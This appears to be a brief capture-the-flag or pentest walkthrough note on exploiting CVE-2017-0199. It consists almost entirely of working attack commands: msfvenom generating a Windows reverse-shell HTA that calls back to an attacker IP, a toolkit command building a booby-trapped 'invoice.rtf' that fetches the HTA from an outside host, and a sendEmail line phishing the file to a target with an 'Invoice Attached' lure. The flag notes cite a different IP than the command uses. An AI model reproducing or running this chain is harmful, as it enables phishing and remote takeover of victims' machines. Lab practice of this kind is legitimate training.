Sending Malicious RTF
CVE-2017-0199
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.19 LPORT=4444 -f hta-psh -o msfv.htapython2 ../cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.16.19/shell.hta -t rtf -x 0
Generating normal RTF payload.
Generated invoice.rtf successfully
Here,
-M gen - generate document
-w invoice.rtf - output file name
-u http://10.10.14.3/shell.hta - url to get the hta from
-t rtf - create rtf document (as opposed to ppsx)
-x 0 - disable rtf obfuscationsendEmail -f [email protected] -t [email protected] -u "Invoice Attached" -m "ABD CDJ JSCSC" -a invoice.rtf -s 10.10.10.77 -v
Last updated